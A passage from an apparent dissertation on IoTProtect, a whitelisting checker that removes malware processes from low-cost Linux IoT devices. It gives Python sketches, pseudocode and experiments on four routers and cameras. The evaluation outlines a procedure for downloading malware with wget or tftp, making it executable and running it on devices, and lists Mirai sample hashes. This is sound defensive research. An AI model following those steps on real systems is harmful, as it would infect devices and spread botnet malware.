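        fields = line.split()
        if len(fields) != 6:
            continue  # skip blank or malformed lines
        device, point, fs_type, options, dump, order = fields
        mounts.append(
            Mount(device, point, fs_type, options.split(","), int(dump), int(order))
        )
    return mounts


# Hypothetical sample, not the real table of the RT-AC3200.
SAMPLE_MOUNTS = """\
rootfs / rootfs rw 0 0
/dev/root / squashfs ro,relatime 0 0
proc /proc proc rw,relatime 0 0
tmpfs /tmp tmpfs rw,relatime 0 0
"""

mounts = parse_mounts(SAMPLE_MOUNTS)
read_only_points = [m.mount_point for m in mounts if "ro" in m.options]
```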
The “rootfs” filesystem is a simple filesystem that exports Linux's disk caching mechanisms as
a dynamically resizable random access memory (RAM)-based filesystem [104]. “Squashfs” is a
compressed read-only filesystem for Linux and is intended for general read-only filesystem use
and for archival [105]. “Devtmpfs” lets the kernel create a tmpfs instance called “devtmpfs” very
early at kernel initialization, before any driver-core device is registered. Every device with a
major/minor number provides a device node in “devtmpfs”. “Devtmpfs” can be modified by users at any time [106].
The “proc” filesystem contains system information, and the files in “/proc” are generated by the
kernel on the fly [99]. The “tmpfs” filesystem is a temporary file storage facility on many Unix-
like operating systems. It does not use traditional non-volatile media to store file data; instead,
“tmpfs” files exist solely in virtual memory maintained by the kernel [107]. “Sysfs” is a
pseudo filesystem provided by the Linux kernel that exports information regarding various kernel
subsystems, hardware devices, and associated device drivers [108]. “Devpts” is a virtual
filesystem available in the Linux kernel since version 2.1.93 (April 1998). It is usually mounted
at /dev/pts and contains solely device files representing slaves to the multiplexing master located
at /dev/ptmx [109]. “JFFS2” is a log-structured filesystem designed for use on flash devices in
embedded systems. It builds on the original JFFS developed by Axis Communications
AB [110]. The “usbfs” filesystem is dynamically generated, similar to the “proc” filesystem.
“Usbfs” complements the normal device node system and can be used to write user space device
drivers [111].
Based on the privileges and features of these filesystems, we categorize three kinds of files in
Linux-based IoT devices:
• Writable files
• Read-only files
• On-the-fly files
Writable files are those that reside on user-writable filesystems. Most of them are the
input/output (I/O) files of the system or configuration files. Read-only files come from
mounted images or read-only filesystems. They are the libraries and applications that implement the
functions and services of IoT devices. On-the-fly files are files that are in the “proc” or “usbfs”
filesystems, are in the kernel, or are generated dynamically by users. The whitelist criteria are
simple. First, ignore on-the-fly files because they are system information entries or come from
USB devices mounted from outside the device. Second, create the pathname whitelist from the read-only files,
since a read-only filesystem holds many libraries and executable files. Finally, create the
hash value whitelist from the writable files. For example, there are 14,514 files in the ASUS RT-AC3200
Wi-Fi router. The distribution of the files is shown in Fig. 23. Of these files, 79% are on-the-fly
files generated by the kernel. Therefore, the number of files to be whitelisted is only 3,048.
Fig. 23 Distribution of ASUS RT-AC3200 files
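The three file categories and the resulting whitelist choice can be sketched as a small decision function. Which filesystem types count as on-the-fly beyond “proc”, “sysfs”, and “usbfs” is an assumption here, as are all names in the snippet; the final lines only re-derive the 3,048 figure from the numbers given in the text.

```python
from typing import List, Optional

# Assumption: filesystem types treated as on-the-fly in this sketch.
ON_THE_FLY_FS = {"proc", "sysfs", "usbfs"}


def classify(fs_type: str, options: List[str]) -> str:
    """Map a mounted filesystem to one of the three file categories."""
    if fs_type in ON_THE_FLY_FS:
        return "on-the-fly"
    if "ro" in options:
        return "read-only"
    return "writable"


def whitelist_kind(category: str) -> Optional[str]:
    """Return which whitelist covers a category (None means ignored)."""
    return {
        "on-the-fly": None,       # ignored by the whitelists
        "read-only": "pathname",  # whitelist by pathname
        "writable": "hash",       # whitelist by hash value
    }[category]


# Arithmetic from the text: 14,514 files, 79% of them on-the-fly.
total_files = 14514
files_to_whitelist = round(total_files * (1 - 0.79))
```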
6.2.3. Major premises of IoTProtect
We assume that IoTProtect is implemented by the device developers and uses the whitelists
they created. There are four conditions. First, the checker and whitelists must be merged into the
kernel or executed in the initial process to prevent attackers or malware from killing the checker
process. Second, we assume that the developers do not use the “mmap” function to produce
anonymous mappings. When the pathname field of a maps entry in “/proc” is blank, the entry is
an anonymous mapping obtained via the “mmap” function of the C library. There is
no easy means of tracing such a mapping back to its source, as there is no field giving the
pathname [100]. Therefore, this is a constraint under which the developers must develop their
devices in order to implement IoTProtect. More precisely, when loading files into memory, they
must not set the "MAP_ANONYMOUS" flag when creating memory mappings. Third, the exe
files in “/proc” can sometimes lose the links to the files they point to. Under Linux 2.2 and later, the
exe file in “/proc” is a symbolic link containing the actual pathname of the executed command.
Attempting to open an exe file opens the original executable, and the symbolic
link can normally be dereferenced. However, if the pathname has been unlinked, the symbolic link will
contain the string '(deleted)' appended to the original pathname. In a multithreaded process, the
contents of this symbolic link are not available if the main thread has already terminated
[100]. Developers must not dereference the exe link to create hash values of the executable
binaries. Moreover, the hash algorithm must be available on the IoT device. Note that we use
MD5 for the actual implementation of IoTProtect tested in the following evaluation. Fourth, if the
developer would like to apply whitelists of cmdline content, the libraries and application files
must be placed in read-only partitions. Furthermore, the full or unique pathname of the
corresponding binaries must be included in the command line to prevent file replacement or false
positives.
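The behavior of the exe link described in the third condition can be observed with a short Python sketch. It assumes a Linux “proc” filesystem for `read_exe_link`; the function names are hypothetical, and the snippet only inspects the link target without hashing anything.

```python
import os
from typing import Optional, Tuple

DELETED_SUFFIX = " (deleted)"


def split_exe_target(target: str) -> Tuple[str, bool]:
    """Separate the original pathname from the '(deleted)' marker.

    Returns (pathname, was_unlinked). The marker is appended by the
    kernel when the executable has been unlinked from the filesystem.
    """
    if target.endswith(DELETED_SUFFIX):
        return target[: -len(DELETED_SUFFIX)], True
    return target, False


def read_exe_link(pid: int) -> Optional[str]:
    """Read /proc/[pid]/exe, or return None when it is unavailable.

    The link cannot be read for kernel threads, for processes that
    have exited, or when permissions are insufficient.
    """
    try:
        return os.readlink(f"/proc/{pid}/exe")
    except OSError:
        return None


# Illustrative link targets (made up).
intact = split_exe_target("/usr/sbin/httpd")
unlinked = split_exe_target("/tmp/dvrHelper (deleted)")
```

A process whose binary has been unlinked, or whose link cannot be read at all, has no file left to hash, which is the case the optional cmdline whitelist is meant to cover.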
6.3. IoTProtect
IoTProtect is a whitelisting method for protecting low-cost IoT devices. IoTProtect consists of
three whitelists and a checker program. The pathname whitelist is a list of pathnames of all
legitimate executables. The hash value whitelist records MD5 hash values of binaries on IoT
devices. The cmdline whitelist and its comparison step are optional and are used only if there
are processes that expose neither a pathname nor a valid exe link in the “proc” filesystem.
We first explain the creation of whitelists. Here we assume that the device to be protected has
already been developed and that the device developer is to install IoTProtect on top of the existing
system. We skip the files coming from on-the-fly filesystems, such as sysfs, proc, usbfs, and I/O
files. If developers know precisely which executable files to include on the whitelist, they can
create their own whitelist manually. However, recent IoT products are often not developed
by a single manufacturer, so no single developer knows all of the legitimate executables
exactly. In such a case, developers can still create whitelists that include all executables existing
in the system by using the Linux command “find” with the “-exec” expression and “md5sum.”
Moreover, the cmdline whitelist can be created by “find” with the “-exec” expression and “cat”
Linux commands.
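For readers who prefer a scripting language over shell commands, the whitelist creation can be approximated in Python as follows. This is only a sketch of the same idea as “find” with “-exec” and “md5sum”: it hashes every regular file under a directory, which is a simplification, and the function names and the temporary demo directory are assumptions.

```python
import hashlib
import os
import tempfile
from typing import Dict


def md5_of_file(path: str, chunk_size: int = 65536) -> str:
    """Compute the MD5 hex digest of a file, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_hash_whitelist(root: str) -> Dict[str, str]:
    """Walk a directory tree and map each regular file to its MD5."""
    whitelist = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            # Skip symbolic links and special files.
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            whitelist[path] = md5_of_file(path)
    return whitelist


# Demo on a throwaway directory holding one made-up "binary".
with tempfile.TemporaryDirectory() as demo_root:
    with open(os.path.join(demo_root, "busybox"), "wb") as handle:
        handle.write(b"hello")
    demo_whitelist = build_hash_whitelist(demo_root)
```

The keys of the resulting dictionary serve as a pathname whitelist and the values as a hash value whitelist.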
IoTProtect conducts process checks through the following steps. The input data come from
entry files of the “proc” filesystem and whitelists. The output is the removal of malicious
processes. The notations used in the pseudocode are shown in Table 28.
Table 28 Table of symbols.
Notations | Definitions and Descriptions
T | Integer variable, the period of process checker
N | Integer variable, number of processes to be checked
M | Set of /proc/[pid]/maps files
Cmd | Set of /proc/[pid]/cmdline files
CL | Set of cmdline
PN | Set of pathnames
WLP, WLH, WLC | Whitelists of the pathname, hash value, and cmdline
Pn1, Pn2 | Entity of pathname
Pid1, Pid2 | Entity of process id
E1, E2 | Entity of exe links
H1, H2 | Entity of hash value
SP | Set of suspicious process id
Cl1, Cl2 | Entity of cmdline content
MD5 (Ei) | Calculate the MD5 hash value of the linked binary
Comp (S, WL) | Comparison of set S and whitelists
Kill (S) | Kill the process of set S by its Pid
Sleep (t) | Pause process checker of IoTProtect for t seconds
← | Assignment
- | Remove entities from the set
A, B, C, D | Sets
|D| | Size of set ‘D’
We explain the details of the IoTProtect procedures with the following pseudocode:
while true
    find and grep Pni from M, i = 1 to n
    PN ← {Pn1, Pn2, …, Pnn}
    Comp (PN, WLP)
    SP ← {Pid1, Pid2, …, Pidj} ∀Pidi ∈ A: Pni ∉ WLP, i = 1 to j
    Hj ← MD5(Ej) ∀Ej ∈ B: Pidi ∈ SP, j = 1 to |SP|
    H ← {H1, H2, …, Hj}, j = 1 to |SP|
    Comp (H, WLH)
    SP – {Pid1, Pid2, …, Pidk} ∀Pidk ∈ C: Hk ∈ WLH
    /* begin optional step of cmdline whitelisting */
    find and grep Cli from Cmd, i = 1 to n
    CL ← {Cl1, Cl2, …, Cli}, i = 1 to n
    Comp (CL, WLC)
    SP – {Pid1, Pid2, …, Pidr} ∀Pidr ∈ D: CLr ∈ WLC
    /* end optional step of cmdline whitelisting */
    Kill(SP)
    Sleep(t)
end while
IoTProtect first marks as suspicious every process whose pathname is not included in the pathname
whitelist, and then clears from this set the processes whose binaries match the hash value whitelist.
If there are any processes with no pathname and exe links, it further clears those whose cmdline
content matches the cmdline whitelist. Finally, it
kills all processes that remain in the suspicious set.
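The filtering order of the pseudocode can be illustrated with the following Python sketch, which operates on already collected process records instead of reading “/proc” directly. It is not the prototype itself: the `ProcInfo` record, the rule that all mapped pathnames of a process must be whitelisted, and the sample data are assumptions made for illustration.

```python
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set


@dataclass
class ProcInfo:
    pid: int
    pathnames: Set[str]     # file pathnames found in /proc/[pid]/maps
    exe_md5: Optional[str]  # MD5 of the binary behind the exe link, if any
    cmdline: str            # content of /proc/[pid]/cmdline


def find_suspicious(
    procs: Iterable[ProcInfo],
    wl_path: Set[str],
    wl_hash: Set[str],
    wl_cmd: Optional[Set[str]] = None,
) -> List[int]:
    """Return the pids that survive all whitelist comparisons."""
    suspicious = []
    for proc in procs:
        # Step 1: pathname whitelist (assumed: every pathname must match).
        if proc.pathnames and proc.pathnames <= wl_path:
            continue
        # Step 2: hash value whitelist for the remaining processes.
        if proc.exe_md5 is not None and proc.exe_md5 in wl_hash:
            continue
        # Step 3 (optional): cmdline whitelist.
        if wl_cmd is not None and proc.cmdline in wl_cmd:
            continue
        suspicious.append(proc.pid)
    return suspicious


# Made-up process table and whitelists.
procs = [
    ProcInfo(1, {"/bin/busybox"}, None, "init"),
    ProcInfo(2, {"/tmp/.bot"}, "ffffffffffffffffffffffffffffffff", "/tmp/.bot"),
    ProcInfo(3, {"/jffs/app"}, "0123456789abcdef0123456789abcdef", "/jffs/app"),
    ProcInfo(4, set(), None, "/usr/sbin/watchdog -t 5"),
]
wl_path = {"/bin/busybox"}
wl_hash = {"0123456789abcdef0123456789abcdef"}
wl_cmd = {"/usr/sbin/watchdog -t 5"}

to_kill = find_suspicious(procs, wl_path, wl_hash, wl_cmd)
to_kill_without_cmd = find_suspicious(procs, wl_path, wl_hash)
```

In a periodic checker, the returned pids would then be killed and the loop would sleep for the configured interval before the next check.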
6.4. Evaluation
We developed a prototype of IoTProtect using shell and AWK scripts together with Linux
commands such as grep, find, and head. We conducted experiments with four actual IoT devices and
4,981 malware binaries captured by our IoT honeypot. We present three
experiments that evaluate the effectiveness and overhead of IoTProtect.
6.4.1. Data collection and experimental devices
We chose four IoT devices for conducting experiments. These devices were known to be
vulnerable and compromised by IoT malware [112] [113] [114]. The brands and specifications of
the devices are listed in Table 29. Given their disk capacities, none of the commercial
products listed in Table 27 can be installed on the four devices. The Dahua IPC-HFW3300 does not support
MD5 hash libraries. Therefore, IoTProtect checks only the pathnames and cmdline of the
corresponding processes on the IP camera.
Table 29 IoT devices used in conducting the experiments.
IoT Device | Model | CPU Arch. | CPU spec. | RAM (MB) | Disk (MB) | Appr. Price
Dahua IPC-HFW3300 | IP Camera | ARM | 300 MHz | 92 | 8 | 325 USD
ASUS RT-AC3200 | Wi-Fi Router | ARM | 1 GHz, 2 cores | 256 | 30.8 | 199.99 USD
ASUS RT-N66U | Wi-Fi Router | MIPSEL | 600 MHz | 256 | 22.3 | 84.99 USD
PRINCETON ShAirDisk | Wi-Fi storage | MIPSEL | 360 MHz | 28 | 4.6 | 26.7 USD
IoTPOT collected 4,981 different IoT malware binaries for ARM and MIPSEL from January
2016 to March 2017. The malware labels, such as Bashlite, Tsunami, and Mirai, come from local
scans by Kaspersky, an anti-virus engine. Based on our previous experience
of submitting 12,000 samples to the VirusTotal web service application programming interface
(API), we consider Kaspersky to be one of the most reliable anti-virus products for IoT malware [115]. VirusTotal is a
website that aggregates many antivirus products and online scan engines [116]. The distribution
of our malware samples is shown in Table 30.
Table 30 IoT malware used for conducting the experiments.
CPU | Bashlite | Tsunami | Mirai | Sum
ARM | 3123 | 51 | 74 | 3248
MIPSEL | 1514 | 27 | 192 | 1733
All | 4637 | 78 | 266 | 4981
6.4.2. Removal experiment
6.4.2.1. Design of experiment
We conducted experiments involving the malware removal process on the four IoT devices as
follows:
1. Log in to the device as root via telnet.
2. Download malware using the “wget” or “tftp” command.
3. Assign the “755” permission to the malware binary.
4. Execute the downloaded malware.
5. Conduct a process check using IoTProtect.
6. Check whether IoTProtect killed the malware process.
6.4.2.2. Experimental Results
The results are shown in Table 31. Many malware binaries ended in segmentation faults (7% to 14%)
or bus errors (0% to 0.8%) when executed on these devices. Two
ARM malware binaries and one MIPSEL binary finished execution before we started
the process checks of IoTProtect. These three malware binaries are similar and contain the same
functions. All they attempted was to install Python on the target devices using “apt-get”
and “yum.” When the installation failed because these installation utilities are not
available on the devices, the malware simply terminated. The complete execution of the
malware takes less than one second, and the process disappears after termination. The apparent purpose
of the malware is to infect an IoT OS on which Python can be installed, such as the IBM Watson IoT Platform
[117]. IoTProtect successfully removed the processes of all but these three malware binaries. The
success rate of removal by IoTProtect against triggered malware was 99.92% if the above three
cases are counted as failed protection, and 100% if they are counted as successful
protection because the malware could not function properly.
Table 31 Results of the removal experiments.
IoT Devices | model | CPU Arch. | Kill | Segmentation fault | bus error | fail
IPC-HFW3300 | IP Camera | ARM | 2774 | 446 | 26 | 2
RT-AC3200 | Wi-Fi Router | ARM | 2732 | 483 | 31 | 2
RT-N66U | Wi-Fi Router | MIPSEL | 1608 | 123 | 1 | 1
ShAirDisk | Wi-Fi storage | MIPSEL | 1622 | 108 | 2 | 1
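The counts in Table 31 can be tallied with a few lines of Python. The sketch treats "triggered" malware as the runs that ended in either a kill or a fail and pools all four devices; this pooling is an assumption, since the text does not state the exact denominator behind the reported success rate.

```python
# Counts copied from Table 31.
TABLE_31 = {
    "IPC-HFW3300": {"kill": 2774, "segfault": 446, "bus_error": 26, "fail": 2},
    "RT-AC3200": {"kill": 2732, "segfault": 483, "bus_error": 31, "fail": 2},
    "RT-N66U": {"kill": 1608, "segfault": 123, "bus_error": 1, "fail": 1},
    "ShAirDisk": {"kill": 1622, "segfault": 108, "bus_error": 2, "fail": 1},
}

# Every row should add up to the number of binaries for its architecture.
row_totals = {device: sum(row.values()) for device, row in TABLE_31.items()}

killed = sum(row["kill"] for row in TABLE_31.values())
failed = sum(row["fail"] for row in TABLE_31.values())

# Strict view: early-terminating malware counts as failed protection.
strict_rate = killed / (killed + failed)
# Lenient view: malware that could not function counts as protected.
lenient_rate = (killed + failed) / (killed + failed)
```

The row totals match the ARM and MIPSEL sample counts in Table 30, which confirms that every binary was executed on every device of its architecture.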
The overheads of IoTProtect on the four devices are shown in Table 32. The disk overheads
include the sizes of whitelists. The size of the IoTProtect checker program is only 1.6 kB. Our
pathname whitelist includes all of the pathnames from the read-only filesystem. The manufacturer
of a device might use a more efficient whitelist. The central processing unit (CPU) overheads are
the maximum values during execution. The three devices other than the IPC-HFW3300
finish a process check of IoTProtect within four seconds. Although the IP camera spent 44
seconds executing the checker program, the original monitoring and display functions of the camera
operated normally without delays.
Table 32 IoTProtect overheads.
IoT Devices | Model | Disk overhead | CPU overhead | Time cost
IPC-HFW3300 | IP Camera | 124.5K | 24% | 44 sec
RT-AC3200 | Wi-Fi Router | 288.4K | 7% | 2 sec
RT-N66U | Wi-Fi Router | 176.5K | 17.6% | 2 sec
ShAirDisk | Wi-Fi storage | 155.5K | 19% | 4 sec
6.4.3. Mitigating outgoing attacks
In practice, IoTProtect would check running processes repeatedly at a designated time
interval. Therefore, it is important to ask whether IoTProtect is sufficiently fast to kill a malware
process before it conducts outgoing attacks against other devices. To measure the worst case, we
chose a Mirai variant, one of the fastest spreading IoT worms, which conducts a telnet scan on
port 2323/tcp right after its execution, even before connecting to its command-and-control server.
The MD5 hash value of the sample is “d6e99a59d44b83e8360745145fa5d2b3.”
6.4.3.1. Design of experiment
As shown in Fig. 24, we conducted the experiment on the ASUS RT-AC3200 Wi-Fi Router.
All traffic was confined to a LAN. At the beginning of the experiment, we executed
the malware. After a fixed interval, we executed IoTProtect to conduct a process check. To simulate
different detection timings, we started the process check of IoTProtect at 1, 5, 10, 20, 30,
and 60 seconds after malware execution. We then measured how many packets went
out from the device before the IoTProtect checker killed the malware process. We conducted this
trial 100 times for each setting.
Fig. 24 Experimental environment for measuring outgoing attack mitigation by IoTProtect
6.4.3.2. Experimental results
The results of the experiment are illustrated in Fig. 25. They confirm that IoTProtect
cannot block every scan by Mirai but does reduce the number of scan packets significantly.
Our measurements show that this Mirai variant generates nearly 2,000 scan packets in the first minute
after it begins execution and would continue to scan at the same rate if it were not killed by
IoTProtect.
Fig. 25 Results of experiment on mitigating outgoing attacks
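A rough way to reason about these results is a constant-rate model: if the malware scans at a steady rate, the number of packets that escape is proportional to the time until the process is killed. The sketch below encodes this model in Python. The linear model, the function names, and the optional check-duration parameter are assumptions for illustration; only the rate of about 2,000 packets per minute comes from the measurement.

```python
# Measured: nearly 2,000 scan packets in the first minute.
SCAN_RATE_PER_SEC = 2000 / 60


def packets_before_kill(delay_s: float, check_time_s: float = 0.0) -> float:
    """Estimate packets sent before the kill under a constant scan rate.

    delay_s is the time between malware start and the start of the
    process check; check_time_s is how long the check itself takes.
    """
    return SCAN_RATE_PER_SEC * (delay_s + check_time_s)


def reduction_vs_one_minute(delay_s: float, check_time_s: float = 0.0) -> float:
    """Fraction of one minute's scan packets that are never sent."""
    exposed = min(delay_s + check_time_s, 60.0)
    return 1.0 - exposed / 60.0


# Estimates for the detection timings used in the experiment.
estimates = {
    delay: reduction_vs_one_minute(delay) for delay in (1, 5, 10, 20, 30, 60)
}
```

Under this model a process check that starts 20 seconds after execution avoids about two-thirds of the packets of the first minute; measured values are expected to be somewhat lower because the check itself takes time.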
6.4.4. Trade-off between security and device performance
We measured the impact of IoTProtect on the performance of the devices. We chose a low-cost
device, ShAirDisk, and analyzed the trade-off between the security and overhead of IoTProtect.
6.4.4.1. Experimental design
As illustrated in Fig. 26, we conducted this experiment in a location at which there were no
other Wi-Fi access points. We uploaded a 200 MB file to the Wi-Fi storage five times to
measure the file upload performance of the device. We conducted this experiment under two
conditions, one with only IoTProtect running and the other with IoTProtect and malware running.
The same procedure as in the previous experiment was followed for malware execution. The MD5
hash of the Mirai variant used for this experiment is “018cb18e9cb415af453ee020fa33aa28.”
Fig. 26 Experimental environment for measuring the trade-off between performance and security
6.4.4.2. Experimental results
Fig. 27 presents the upload times under different IoTProtect check intervals. In the
figure, the blue bars show the average upload times with only IoTProtect running,
and the orange bars show the average upload times with both malware
and IoTProtect running. The differences between the orange and blue bars at
the same interval are small, less than 12.4 seconds; that is, the malware
infection itself added only a limited delay to the file upload. However, if we
shorten the interval of IoTProtect process checks to 1.0 second to increase security, the overhead
increases significantly, to a 55% increase in upload time compared to the case without
IoTProtect. On the other hand, intervals of more than 30 seconds do not harm
performance significantly.
Fig. 27 Results of experiment measuring trade-off
6.4.5. Evaluation of easy deployment
The deployment of IoTProtect involves two steps: the creation of whitelists and the
installation of the IoTProtect checker. We created worst-case whitelists because we are not the developers
of these devices. These whitelists exclude only “sysfs,” “proc,” “usbfs,” and I/O files. The
time costs are shown in Table 33. Even general users can create worst-case whitelists in only
a few minutes.
Table 33 Cost of creating whitelists.
IoT Devices | model | whitelists size | whitelists time cost
IPC-HFW3300 | IP Camera | 123.0K | *29 sec
RT-AC3200 | Wi-Fi Router | 285.9K | 218 sec
RT-N66U | Wi-Fi Router | 175.0K | 157 sec
ShAirDisk | Wi-Fi storage | 154.0K | 188 sec
*This IP camera lacks hash libraries and contains some processes without pathname and valid exe links. We created the cmdline whitelist instead of hash value whitelists.
The installation procedure for the IoTProtect checker is light and quick. The checker
program is written as Bash scripts, which makes it portable across different Linux distributions.
Moreover, because the size of the checker program is only 1.5KB, it is easy to
deploy on low-cost IoT devices. Finally, the installation procedure consists
only of copying a file and assigning the execute permission. The checker script runs
independently of most Linux kernel modules. Users can easily invoke it in the Linux startup
process and have it run in the background or as a daemon.
6.5. Discussion
From the removal experiment, we see that our method applies to different CPU architectures
and models of IoT devices. Furthermore, IoTProtect successfully removed several thousand
different malware processes with nearly 100% success. In the experiment on mitigating outgoing
attacks, IoTProtect reduced the scan attack traffic caused by a rapidly spreading Mirai variant,
even when the process check was not very frequent. The results of the performance experiment show
that IoTProtect can be installed in some low-cost devices without a significant drop in
performance if the process checking interval is configured appropriately.
We found that IoTProtect was considerably slower on one of the tested devices,
the Dahua IP Camera, as shown in Table 32. We could improve the performance of IoTProtect by
implementing it in the C language and by reducing the size of the whitelists. According to a
comparative study of programming languages in 2015, C is the best language for computing-intensive
tasks [118]. Moreover, the worst-case whitelists we created for the experiments
contain thousands of pathnames and MD5 hash values. Manufacturers can build much more compact
whitelists for their products.
For mitigating outgoing attacks, we find that IoTProtect cannot block all outgoing scan packets.
It can remove the malware process, but the malware may already have sent thousands of scan
packets before it is killed. We consider this shortcoming to be a limitation of IoTProtect. If we
shorten the interval of IoTProtect’s process checks from 60 seconds to 20 seconds, the number of scan
packets is reduced by 66%. Moreover, an interval of one second could stop 96.72% of the scan
packets that could have been sent out in one minute. Note that, as the worst-case scenario, we used a
Mirai variant that is one of the fastest known IoT worms and begins scanning right after execution.
However, most Mirai malware would connect to the command-and-control server first and then start
the scan and DoS attack after receiving commands. Hence, in most real cases, IoTProtect could
block most of the outgoing attacks within an acceptable time interval.
Our performance experiment on Wi-Fi storage shows that the file upload speed of the device is
significantly affected by the interval of IoTProtect’s process check. On the tested Wi-Fi storage
devices, the best interval can be 20 to 30 seconds, which will introduce a 7.1% to 12.4% increase
in file upload time while protecting from and mitigating most of the attacks by the malware
infection, as discussed above.
IoTProtect is easy to deploy, but creating proper whitelists can take some effort.
If the developers use third-party libraries and an open-source OS for their IoT
products, they might know only the processes created by their own applications and have limited
information about all of the other benign processes. In such a case, the developers must collect all
executable files installed on the device, such as the files in “/bin” and “/usr/bin,” as we did in the
experiment. When they conduct software testing, they must record all of the created
processes to avoid false positive detection by IoTProtect.
6.5.1. Comparison with previous studies
• The method by Paleari et al. must apply QEMU and behavior clustering [32], which are too
expensive to implement on low-cost devices.
• Shahzad et al. analyzed 11 features from the kernel and achieved 93% detection accuracy
[33]. However, the system requires many features, executes a decision tree algorithm, and is
difficult to install on low-cost devices. IoTProtect, in contrast, was able to remove 99.92%
of malware processes from several thousand malware binaries. We assume here that our method
does not cause false positives as long as the whitelist is created appropriately by the device
developers. However, as discussed in the previous section, the creation of whitelists can
involve difficulties during the manufacturing process. Our future work will include
investigating proper whitelisting.
• Tamiya et al. investigated a simple solution for malware removal by rebooting the device,
which can be applied to low-cost IoT devices [34]. However, they do not offer a methodology
for detecting the malware infection, and they also mention that connected vulnerable
devices would be infected again after removal unless the vulnerability is fixed. Therefore,
their solution would not be able to defend the device.
• There are platform and resource constraint issues for commercial products such as McAfee
Embedded Control 6.x. These solutions cannot be installed on low-cost IoT devices. Moreover, McAfee Embedded Control
6.x must rebuild the kernel when installed on a Linux distribution, introducing significant
engineering cost, especially if deployed on existing commercial products.
• Koike et al. developed a whitelisting-type execution control module “WhiteEgret” on Linux
[35]. Similarly to McAfee Embedded Control, WhiteEgret also requires rebuilding the Linux kernel upon
installation, which likewise introduces substantial engineering cost.
6.5.2. Limitations
IoTProtect does have some limitations. Many of the limitations come from the design of Linux
process information and our whitelisting idea. First, IoTProtect depends on exe and maps entries
in the “proc” filesystem. Kernel-level malware and toolkits that disable or alter these
functionalities would evade detection by IoTProtect. Moreover, checks and removal by
IoTProtect are performed on filesystems, with the result that code injection on a legitimate process
in memory cannot be detected.
Second, the defense offered by IoTProtect is not prevention but mitigation of malware infection.
It would help substantially in defending against long-lasting malicious activities such as DDoS,
spamming, bitcoin mining, click fraud, and stepping stones for other attacks. On the other hand,
attacks that can be performed in a very short time, such as credential and privacy data exfiltration,
might not be mitigated well. Applying a whitelist before malware execution would require process
creation hooking. We did not choose this approach for two reasons. First, the hooking of process
creation would involve modification of the Linux kernel [119] and hence increase the deployment
cost for device developers. We believe that IoTProtect is easier to implement and use than the
hooking method. Second, hooking every process creation and checking all created processes
before they are executed would slow down the principal functionality of the devices, especially
at the time of device boot-up when many processes are created and checked.
For new IoT devices, developers can select and build their own secure OS distribution. However,
changing the OS of existing devices is not easy. First, extending the resources of a device is
difficult; if the RAM, CPU, or disk capacity is insufficient, a secure OS cannot be installed on the
device. Second, changing the OS would require manufacturers to re-run device test cases.
Test cases that include stability or burn-in testing, i.e., running devices at different voltages
for several months, would consume substantial labor and time. Third, some Linux security modules
are kernel-space programs that apply a whitelist mechanism. Such modules affect the activation of
all kernel and user-space applications. Installing such a module requires rebuilding the OS kernel and
re-examining all kernel and user-space applications. IoTProtect is a user-space application.
Therefore, developers and manufacturers need to examine only the user-space applications, because, for example, user
applications cannot kill kernel processes. According to a Gartner report, more than 8.4
billion connected IoT devices were in use worldwide in 2017 [1]. Moreover, most of these devices
lack defense mechanisms. IoTProtect is a simple solution for them with lower development and
testing costs.
There are four major conditions that a developer must follow in order to deploy IoTProtect as
described in Section 6.2.3. These can be the constraints for device developers. In addition, if the
conditions are not satisfied by existing devices, this might require additional effort to modify the
firmware, thereby limiting the advantage of easy deployment. We can at least say that these
conditions are satisfied for the four existing devices we tested.
Chapter 7.
Conclusion and future works
7.1 Conclusion
In recent years, the cyber threat against IoT has become a reality. Mirai botnets executed a
massive distributed denial-of-service (DDoS) attack against Dyn DNS in 2016. A report from
Kaspersky in September 2018 shows that Mirai is still the most popular IoT malware family among
cybercriminals (20.9%). In addition, IoT malware keeps evolving and exploits multiple
vulnerabilities to infect IoT devices. Since May 2018, the Mirai and Bashlite malware families
have assimilated many known exploits affecting IoT devices. These exploits
target devices from 11 makers over the HTTP, UPnP, Telnet, and SOAP protocols. Hence, the
tools for observing cyber attacks in IoT should be reconsidered and evaluated. To observe
these complicated attack vectors, we used physical IoT devices to build the honeypot. However,
physical IoT devices bring management challenges and information leak problems.
In Chapter 3, we introduced frequent cyber attacks against IoT and then described a framework
for the observation, analysis, and countermeasure of cyber attacks in IoT. The first component is
a set of techniques to support a honeypot consisting of physical IoT devices: the MITM proxy can
control the incoming and outgoing traffic of the honeypot, filter out unwanted attack flows, and
prevent information leaks. The second is a set of techniques for analyzing the massive data of an
IoT honeypot: we apply text-mining and machine learning algorithms to find new attack vectors and
categorize known botnets' attacks. The third is a whitelisting-based countermeasure against cyber
attacks in IoT. Moreover, we showed how to protect the IoT devices in the honeypot from unwanted
cyber attacks, and how to create an appropriate view that analyzes the incoming data in depth and
uses our resources efficiently. Finally, we showed a method to recognize IoT malware processes
by examining the pathnames and binary hash values exposed in the "/proc" folder.
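The "/proc"-based recognition summarized above can be illustrated with a minimal Python sketch. It is not the IoTProtect prototype, which the dissertation implements as a shell script. The function names, the whitelist layout (pathname mapped to digest), and the choice of SHA-256 are assumptions made only for this illustration.

```python
import hashlib
import os
from typing import Dict, Iterator, List, Tuple


def sha256_of(data: bytes) -> str:
    """Return the hex SHA-256 digest of a binary image (hash choice is an assumption)."""
    return hashlib.sha256(data).hexdigest()


def is_whitelisted(pathname: str, digest: str, whitelist: Dict[str, str]) -> bool:
    """A process passes only if its pathname is listed and its hash matches."""
    return whitelist.get(pathname) == digest


def iter_processes(proc_root: str = "/proc") -> Iterator[Tuple[int, str, str]]:
    """Yield (pid, pathname, digest) for every process whose executable is readable."""
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # only numeric directories describe processes
        exe_link = os.path.join(proc_root, entry, "exe")
        try:
            pathname = os.readlink(exe_link)  # pathname of the running binary
            with open(exe_link, "rb") as handle:
                digest = sha256_of(handle.read())
        except OSError:
            continue  # kernel threads, exited processes, or missing permission
        yield int(entry), pathname, digest


def find_suspects(whitelist: Dict[str, str], proc_root: str = "/proc") -> List[Tuple[int, str]]:
    """List (pid, pathname) of processes that are not covered by the whitelist."""
    return [
        (pid, pathname)
        for pid, pathname, digest in iter_processes(proc_root)
        if not is_whitelisted(pathname, digest, whitelist)
    ]
```

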